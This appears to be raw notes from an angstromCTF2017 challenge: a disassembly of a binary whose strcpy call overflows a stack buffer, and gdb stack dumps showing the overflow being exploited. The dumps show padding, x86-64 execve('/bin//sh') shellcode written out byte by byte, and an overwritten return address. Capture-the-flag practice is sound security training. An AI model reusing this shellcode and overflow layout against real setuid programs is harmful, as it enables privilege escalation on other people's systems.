
art_of_the_shell:     file format elf64-x86-64


Disassembly of section .init:

0000000000400478 <_init>:
  400478:	48 83 ec 08          	sub    rsp,0x8
  40047c:	48 8b 05 75 0b 20 00 	mov    rax,QWORD PTR [rip+0x200b75]        # 600ff8 <_DYNAMIC+0x1d0>
  400483:	48 85 c0             	test   rax,rax
  400486:	74 05                	je     40048d <_init+0x15>
  400488:	e8 73 00 00 00       	call   400500 <getegid@plt+0x10>
  40048d:	48 83 c4 08          	add    rsp,0x8
  400491:	c3                   	ret    

Disassembly of section .plt:

00000000004004a0 <strcpy@plt-0x10>:
  4004a0:	ff 35 62 0b 20 00    	push   QWORD PTR [rip+0x200b62]        # 601008 <_GLOBAL_OFFSET_TABLE_+0x8>
  4004a6:	ff 25 64 0b 20 00    	jmp    QWORD PTR [rip+0x200b64]        # 601010 <_GLOBAL_OFFSET_TABLE_+0x10>
  4004ac:	0f 1f 40 00          	nop    DWORD PTR [rax+0x0]

00000000004004b0 <strcpy@plt>:
  4004b0:	ff 25 62 0b 20 00    	jmp    QWORD PTR [rip+0x200b62]        # 601018 <_GLOBAL_OFFSET_TABLE_+0x18>
  4004b6:	68 00 00 00 00       	push   0x0
  4004bb:	e9 e0 ff ff ff       	jmp    4004a0 <_init+0x28>

00000000004004c0 <puts@plt>:
  4004c0:	ff 25 5a 0b 20 00    	jmp    QWORD PTR [rip+0x200b5a]        # 601020 <_GLOBAL_OFFSET_TABLE_+0x20>
  4004c6:	68 01 00 00 00       	push   0x1
  4004cb:	e9 d0 ff ff ff       	jmp    4004a0 <_init+0x28>

00000000004004d0 <setresgid@plt>:
  4004d0:	ff 25 52 0b 20 00    	jmp    QWORD PTR [rip+0x200b52]        # 601028 <_GLOBAL_OFFSET_TABLE_+0x28>
  4004d6:	68 02 00 00 00       	push   0x2
  4004db:	e9 c0 ff ff ff       	jmp    4004a0 <_init+0x28>

00000000004004e0 <__libc_start_main@plt>:
  4004e0:	ff 25 4a 0b 20 00    	jmp    QWORD PTR [rip+0x200b4a]        # 601030 <_GLOBAL_OFFSET_TABLE_+0x30>
  4004e6:	68 03 00 00 00       	push   0x3
  4004eb:	e9 b0 ff ff ff       	jmp    4004a0 <_init+0x28>

00000000004004f0 <getegid@plt>:
  4004f0:	ff 25 42 0b 20 00    	jmp    QWORD PTR [rip+0x200b42]        # 601038 <_GLOBAL_OFFSET_TABLE_+0x38>
  4004f6:	68 04 00 00 00       	push   0x4
  4004fb:	e9 a0 ff ff ff       	jmp    4004a0 <_init+0x28>

Disassembly of section .plt.got:

0000000000400500 <.plt.got>:
  400500:	ff 25 f2 0a 20 00    	jmp    QWORD PTR [rip+0x200af2]        # 600ff8 <_DYNAMIC+0x1d0>
  400506:	66 90                	xchg   ax,ax

Disassembly of section .text:

0000000000400510 <_start>:
  400510:	31 ed                	xor    ebp,ebp
  400512:	49 89 d1             	mov    r9,rdx
  400515:	5e                   	pop    rsi
  400516:	48 89 e2             	mov    rdx,rsp
  400519:	48 83 e4 f0          	and    rsp,0xfffffffffffffff0
  40051d:	50                   	push   rax
  40051e:	54                   	push   rsp
  40051f:	49 c7 c0 20 07 40 00 	mov    r8,0x400720
  400526:	48 c7 c1 b0 06 40 00 	mov    rcx,0x4006b0
  40052d:	48 c7 c7 57 06 40 00 	mov    rdi,0x400657
  400534:	e8 a7 ff ff ff       	call   4004e0 <__libc_start_main@plt>
  400539:	f4                   	hlt    
  40053a:	66 0f 1f 44 00 00    	nop    WORD PTR [rax+rax*1+0x0]

0000000000400540 <deregister_tm_clones>:
  400540:	b8 57 10 60 00       	mov    eax,0x601057
  400545:	55                   	push   rbp
  400546:	48 2d 50 10 60 00    	sub    rax,0x601050
  40054c:	48 83 f8 0e          	cmp    rax,0xe
  400550:	48 89 e5             	mov    rbp,rsp
  400553:	76 1b                	jbe    400570 <deregister_tm_clones+0x30>
  400555:	b8 00 00 00 00       	mov    eax,0x0
  40055a:	48 85 c0             	test   rax,rax
  40055d:	74 11                	je     400570 <deregister_tm_clones+0x30>
  40055f:	5d                   	pop    rbp
  400560:	bf 50 10 60 00       	mov    edi,0x601050
  400565:	ff e0                	jmp    rax
  400567:	66 0f 1f 84 00 00 00 	nop    WORD PTR [rax+rax*1+0x0]
  40056e:	00 00 
  400570:	5d                   	pop    rbp
  400571:	c3                   	ret    
  400572:	0f 1f 40 00          	nop    DWORD PTR [rax+0x0]
  400576:	66 2e 0f 1f 84 00 00 	nop    WORD PTR cs:[rax+rax*1+0x0]
  40057d:	00 00 00 

0000000000400580 <register_tm_clones>:
  400580:	be 50 10 60 00       	mov    esi,0x601050
  400585:	55                   	push   rbp
  400586:	48 81 ee 50 10 60 00 	sub    rsi,0x601050
  40058d:	48 c1 fe 03          	sar    rsi,0x3
  400591:	48 89 e5             	mov    rbp,rsp
  400594:	48 89 f0             	mov    rax,rsi
  400597:	48 c1 e8 3f          	shr    rax,0x3f
  40059b:	48 01 c6             	add    rsi,rax
  40059e:	48 d1 fe             	sar    rsi,1
  4005a1:	74 15                	je     4005b8 <register_tm_clones+0x38>
  4005a3:	b8 00 00 00 00       	mov    eax,0x0
  4005a8:	48 85 c0             	test   rax,rax
  4005ab:	74 0b                	je     4005b8 <register_tm_clones+0x38>
  4005ad:	5d                   	pop    rbp
  4005ae:	bf 50 10 60 00       	mov    edi,0x601050
  4005b3:	ff e0                	jmp    rax
  4005b5:	0f 1f 00             	nop    DWORD PTR [rax]
  4005b8:	5d                   	pop    rbp
  4005b9:	c3                   	ret    
  4005ba:	66 0f 1f 44 00 00    	nop    WORD PTR [rax+rax*1+0x0]

00000000004005c0 <__do_global_dtors_aux>:
  4005c0:	80 3d 89 0a 20 00 00 	cmp    BYTE PTR [rip+0x200a89],0x0        # 601050 <__TMC_END__>
  4005c7:	75 11                	jne    4005da <__do_global_dtors_aux+0x1a>
  4005c9:	55                   	push   rbp
  4005ca:	48 89 e5             	mov    rbp,rsp
  4005cd:	e8 6e ff ff ff       	call   400540 <deregister_tm_clones>
  4005d2:	5d                   	pop    rbp
  4005d3:	c6 05 76 0a 20 00 01 	mov    BYTE PTR [rip+0x200a76],0x1        # 601050 <__TMC_END__>
  4005da:	f3 c3                	repz ret 
  4005dc:	0f 1f 40 00          	nop    DWORD PTR [rax+0x0]

00000000004005e0 <frame_dummy>:
  4005e0:	bf 20 0e 60 00       	mov    edi,0x600e20
  4005e5:	48 83 3f 00          	cmp    QWORD PTR [rdi],0x0
  4005e9:	75 05                	jne    4005f0 <frame_dummy+0x10>
  4005eb:	eb 93                	jmp    400580 <register_tm_clones>
  4005ed:	0f 1f 00             	nop    DWORD PTR [rax]
  4005f0:	b8 00 00 00 00       	mov    eax,0x0
  4005f5:	48 85 c0             	test   rax,rax
  4005f8:	74 f1                	je     4005eb <frame_dummy+0xb>
  4005fa:	55                   	push   rbp
  4005fb:	48 89 e5             	mov    rbp,rsp
  4005fe:	ff d0                	call   rax
  400600:	5d                   	pop    rbp
  400601:	e9 7a ff ff ff       	jmp    400580 <register_tm_clones>

0000000000400606 <be_nice_to_people>:
  400606:	55                   	push   rbp
  400607:	48 89 e5             	mov    rbp,rsp
  40060a:	48 83 ec 10          	sub    rsp,0x10
  40060e:	b8 00 00 00 00       	mov    eax,0x0
  400613:	e8 d8 fe ff ff       	call   4004f0 <getegid@plt>
  400618:	89 45 fc             	mov    DWORD PTR [rbp-0x4],eax
  40061b:	8b 55 fc             	mov    edx,DWORD PTR [rbp-0x4]
  40061e:	8b 4d fc             	mov    ecx,DWORD PTR [rbp-0x4]
  400621:	8b 45 fc             	mov    eax,DWORD PTR [rbp-0x4]
  400624:	89 ce                	mov    esi,ecx
  400626:	89 c7                	mov    edi,eax
  400628:	b8 00 00 00 00       	mov    eax,0x0
  40062d:	e8 9e fe ff ff       	call   4004d0 <setresgid@plt>
  400632:	90                   	nop
  400633:	c9                   	leave  
  400634:	c3                   	ret    

0000000000400635 <vuln>:
  400635:	55                   	push   rbp
  400636:	48 89 e5             	mov    rbp,rsp
  400639:	48 83 ec 50          	sub    rsp,0x50
  40063d:	48 89 7d b8          	mov    QWORD PTR [rbp-0x48],rdi
  400641:	48 8b 55 b8          	mov    rdx,QWORD PTR [rbp-0x48]
  400645:	48 8d 45 c0          	lea    rax,[rbp-0x40]
  400649:	48 89 d6             	mov    rsi,rdx
  40064c:	48 89 c7             	mov    rdi,rax
  40064f:	e8 5c fe ff ff       	call   4004b0 <strcpy@plt>
  400654:	90                   	nop
  400655:	c9                   	leave  
  400656:	c3                   	ret    

0000000000400657 <main>:
  400657:	55                   	push   rbp
  400658:	48 89 e5             	mov    rbp,rsp
  40065b:	48 83 ec 10          	sub    rsp,0x10
  40065f:	89 7d fc             	mov    DWORD PTR [rbp-0x4],edi
  400662:	48 89 75 f0          	mov    QWORD PTR [rbp-0x10],rsi
  400666:	83 7d fc 02          	cmp    DWORD PTR [rbp-0x4],0x2
  40066a:	74 11                	je     40067d <main+0x26>
  40066c:	bf 34 07 40 00       	mov    edi,0x400734
  400671:	e8 4a fe ff ff       	call   4004c0 <puts@plt>
  400676:	b8 01 00 00 00       	mov    eax,0x1
  40067b:	eb 22                	jmp    40069f <main+0x48>
  40067d:	b8 00 00 00 00       	mov    eax,0x0
  400682:	e8 7f ff ff ff       	call   400606 <be_nice_to_people>
  400687:	48 8b 45 f0          	mov    rax,QWORD PTR [rbp-0x10]
  40068b:	48 83 c0 08          	add    rax,0x8
  40068f:	48 8b 00             	mov    rax,QWORD PTR [rax]
  400692:	48 89 c7             	mov    rdi,rax
  400695:	e8 9b ff ff ff       	call   400635 <vuln>
  40069a:	b8 00 00 00 00       	mov    eax,0x0
  40069f:	c9                   	leave  
  4006a0:	c3                   	ret    
  4006a1:	66 2e 0f 1f 84 00 00 	nop    WORD PTR cs:[rax+rax*1+0x0]
  4006a8:	00 00 00 
  4006ab:	0f 1f 44 00 00       	nop    DWORD PTR [rax+rax*1+0x0]

00000000004006b0 <__libc_csu_init>:
  4006b0:	41 57                	push   r15
  4006b2:	41 56                	push   r14
  4006b4:	41 89 ff             	mov    r15d,edi
  4006b7:	41 55                	push   r13
  4006b9:	41 54                	push   r12
  4006bb:	4c 8d 25 4e 07 20 00 	lea    r12,[rip+0x20074e]        # 600e10 <__frame_dummy_init_array_entry>
  4006c2:	55                   	push   rbp
  4006c3:	48 8d 2d 4e 07 20 00 	lea    rbp,[rip+0x20074e]        # 600e18 <__init_array_end>
  4006ca:	53                   	push   rbx
  4006cb:	49 89 f6             	mov    r14,rsi
  4006ce:	49 89 d5             	mov    r13,rdx
  4006d1:	4c 29 e5             	sub    rbp,r12
  4006d4:	48 83 ec 08          	sub    rsp,0x8
  4006d8:	48 c1 fd 03          	sar    rbp,0x3
  4006dc:	e8 97 fd ff ff       	call   400478 <_init>
  4006e1:	48 85 ed             	test   rbp,rbp
  4006e4:	74 20                	je     400706 <__libc_csu_init+0x56>
  4006e6:	31 db                	xor    ebx,ebx
  4006e8:	0f 1f 84 00 00 00 00 	nop    DWORD PTR [rax+rax*1+0x0]
  4006ef:	00 
  4006f0:	4c 89 ea             	mov    rdx,r13
  4006f3:	4c 89 f6             	mov    rsi,r14
  4006f6:	44 89 ff             	mov    edi,r15d
  4006f9:	41 ff 14 dc          	call   QWORD PTR [r12+rbx*8]
  4006fd:	48 83 c3 01          	add    rbx,0x1
  400701:	48 39 eb             	cmp    rbx,rbp
  400704:	75 ea                	jne    4006f0 <__libc_csu_init+0x40>
  400706:	48 83 c4 08          	add    rsp,0x8
  40070a:	5b                   	pop    rbx
  40070b:	5d                   	pop    rbp
  40070c:	41 5c                	pop    r12
  40070e:	41 5d                	pop    r13
  400710:	41 5e                	pop    r14
  400712:	41 5f                	pop    r15
  400714:	c3                   	ret    
  400715:	90                   	nop
  400716:	66 2e 0f 1f 84 00 00 	nop    WORD PTR cs:[rax+rax*1+0x0]
  40071d:	00 00 00 

0000000000400720 <__libc_csu_fini>:
  400720:	f3 c3                	repz ret 

Disassembly of section .fini:

0000000000400724 <_fini>:
  400724:	48 83 ec 08          	sub    rsp,0x8
  400728:	48 83 c4 08          	add    rsp,0x8
  40072c:	c3                   	ret    

gdb-peda$ telescope 0x7fffffffde60 50
0000| 0x7fffffffde60 --> 0x3e8
0008| 0x7fffffffde68 --> 0x7fffffffe281 ('A' <repeats 64 times>)
0016| 0x7fffffffde70 ('A' <repeats 64 times>)
0024| 0x7fffffffde78 ('A' <repeats 56 times>)
0032| 0x7fffffffde80 ('A' <repeats 48 times>)
0040| 0x7fffffffde88 ('A' <repeats 40 times>)
0048| 0x7fffffffde90 ('A' <repeats 32 times>)
0056| 0x7fffffffde98 ('A' <repeats 24 times>)
0064| 0x7fffffffdea0 ('A' <repeats 16 times>)
0072| 0x7fffffffdea8 ("AAAAAAAA")
0080| 0x7fffffffdeb0 --> 0x7fffffffde00 --> 0x7fffffffde70 ('A' <repeats 64 times>)
0088| 0x7fffffffdeb8 --> 0x40069a (<main+67>: mov    eax,0x0)

gdb-peda$ telescope 0x7fffffffde00 50
0000| 0x7fffffffde00 --> 0x3e8
0008| 0x7fffffffde08 --> 0x7fffffffe225 ("x48x31xd2x48xbbx2fx2fx62x69x6ex2fx73x68x48xc1xebx08x53x48x89xe7x50x57x48x89xe6xb0x3bx0fx05", 'A' <repeats 34 times>, "BBBBBBBBx68xdexffxffxffxffxffx07")
0016| 0x7fffffffde10 ("x48x31xd2x48xbbx2fx2fx62x69x6ex2fx73x68x48xc1xebx08x53x48x89xe7x50x57x48x89xe6xb0x3bx0fx05", 'A' <repeats 34 times>, "BBBBBBBBx68xdexffxffxffxffxffx07")
0024| 0x7fffffffde18 ("2x48xbbx2fx2fx62x69x6ex2fx73x68x48xc1xebx08x53x48x89xe7x50x57x48x89xe6xb0x3bx0fx05", 'A' <repeats 34 times>, "BBBBBBBBx68xdexffxffxffxffxffx07")
0032| 0x7fffffffde20 ("2fx2fx62x69x6ex2fx73x68x48xc1xebx08x53x48x89xe7x50x57x48x89xe6xb0x3bx0fx05", 'A' <repeats 34 times>, "BBBBBBBBx68xdexffxffxffxffxffx07")
0040| 0x7fffffffde28 ("x69x6ex2fx73x68x48xc1xebx08x53x48x89xe7x50x57x48x89xe6xb0x3bx0fx05", 'A' <repeats 34 times>, "BBBBBBBBx68xdexffxffxffxffxffx07")
0048| 0x7fffffffde30 ("fx73x68x48xc1xebx08x53x48x89xe7x50x57x48x89xe6xb0x3bx0fx05", 'A' <repeats 34 times>, "BBBBBBBBx68xdexffxffxffxffxffx07")
0056| 0x7fffffffde38 ("48xc1xebx08x53x48x89xe7x50x57x48x89xe6xb0x3bx0fx05", 'A' <repeats 34 times>, "BBBBBBBBx68xdexffxffxffxffxffx07")
0064| 0x7fffffffde40 ("x08x53x48x89xe7x50x57x48x89xe6xb0x3bx0fx05", 'A' <repeats 34 times>, "BBBBBBBBx68xdexffxffxffxffxffx07")
0072| 0x7fffffffde48 ("8x89xe7x50x57x48x89xe6xb0x3bx0fx05", 'A' <repeats 34 times>, "BBBBBBBBx68xdexffxffxffxffxffx07")
0080| 0x7fffffffde50 ("50x57x48x89xe6xb0x3bx0fx05", 'A' <repeats 34 times>, "BBBBBBBBx68xdexffxffxffxffxffx07")
0088| 0x7fffffffde58 ("x89xe6xb0x3bx0fx05", 'A' <repeats 34 times>, "BBBBBBBBx68xdexffxffxffxffxffx07")
0096| 0x7fffffffde60 ("0x3bx0fx05", 'A' <repeats 34 times>, "BBBBBBBBx68xdexffxffxffxffxffx07")
0104| 0x7fffffffde68 ("05", 'A' <repeats 34 times>, "BBBBBBBBx68xdexffxffxffxffxffx07")
0112| 0x7fffffffde70 ('A' <repeats 28 times>, "BBBBBBBBx68xdexffxffxffxffxffx07")
0120| 0x7fffffffde78 ('A' <repeats 20 times>, "BBBBBBBBx68xdexffxffxffxffxffx07")
0128| 0x7fffffffde80 ('A' <repeats 12 times>, "BBBBBBBBx68xdexffxffxffxffxffx07")
0136| 0x7fffffffde88 ("AAAABBBBBBBBx68xdexffxffxffxffxffx07")
0144| 0x7fffffffde90 ("BBBBx68xdexffxffxffxffxffx07")
0152| 0x7fffffffde98 ("dexffxffxffxffxffx07")
0160| 0x7fffffffdea0 ("xffxffxffx07")
0168| 0x7fffffffdea8 --> 0xf9f5140037307866
0176| 0x7fffffffdeb0 --> 0x400510 (<_start>:  xor    ebp,ebp)
0184| 0x7fffffffdeb8 --> 0x7fffffffdf50 --> 0x2
0192| 0x7fffffffdec0 --> 0x0

0000| 0x7fffffffde50 --> 0x7ffff7de78e0 (<_dl_fini>:  push   rbp)
0008| 0x7fffffffde58 --> 0x7fffffffe279 ('A' <repeats 64 times>, "BBBBBBBB")
0016| 0x7fffffffde60 ('A' <repeats 64 times>, "BBBBBBBB")
0024| 0x7fffffffde68 ('A' <repeats 56 times>, "BBBBBBBB")
0032| 0x7fffffffde70 ('A' <repeats 48 times>, "BBBBBBBB")
0040| 0x7fffffffde78 ('A' <repeats 40 times>, "BBBBBBBB")
0048| 0x7fffffffde80 ('A' <repeats 32 times>, "BBBBBBBB")
0056| 0x7fffffffde88 ('A' <repeats 24 times>, "BBBBBBBB")
0064| 0x7fffffffde90 ('A' <repeats 16 times>, "BBBBBBBB")
0072| 0x7fffffffde98 ("AAAAAAAABBBBBBBB")
0080| 0x7fffffffdea0 ("BBBBBBBB")
0088| 0x7fffffffdea8 --> 0x400600 (<frame_dummy+32>:  pop    rbp)
0096| 0x7fffffffdeb0 --> 0x7fffffffdfa8 --> 0x7fffffffe23e ("/home/user/ctf/angstromCTF2017/ArtOfShell/art_of_the_shell")
0104| 0x7fffffffdeb8 --> 0x200000000
0112| 0x7fffffffdec0 --> 0x4006b0 (<__libc_csu_init>: push   r15)
0120| 0x7fffffffdec8 --> 0x7ffff7a2e830 (<__libc_start_main+240>: mov    edi,eax)
0128| 0x7fffffffded0 --> 0x0
0136| 0x7fffffffded8 --> 0x7fffffffdfa8 --> 0x7fffffffe23e ("/home/user/ctf/angstromCTF2017/ArtOfShell/art_of_the_shell")
0144| 0x7fffffffdee0 --> 0x2f7ffcca0
0152| 0x7fffffffdee8 --> 0x400657 (<main>:  push   rbp)

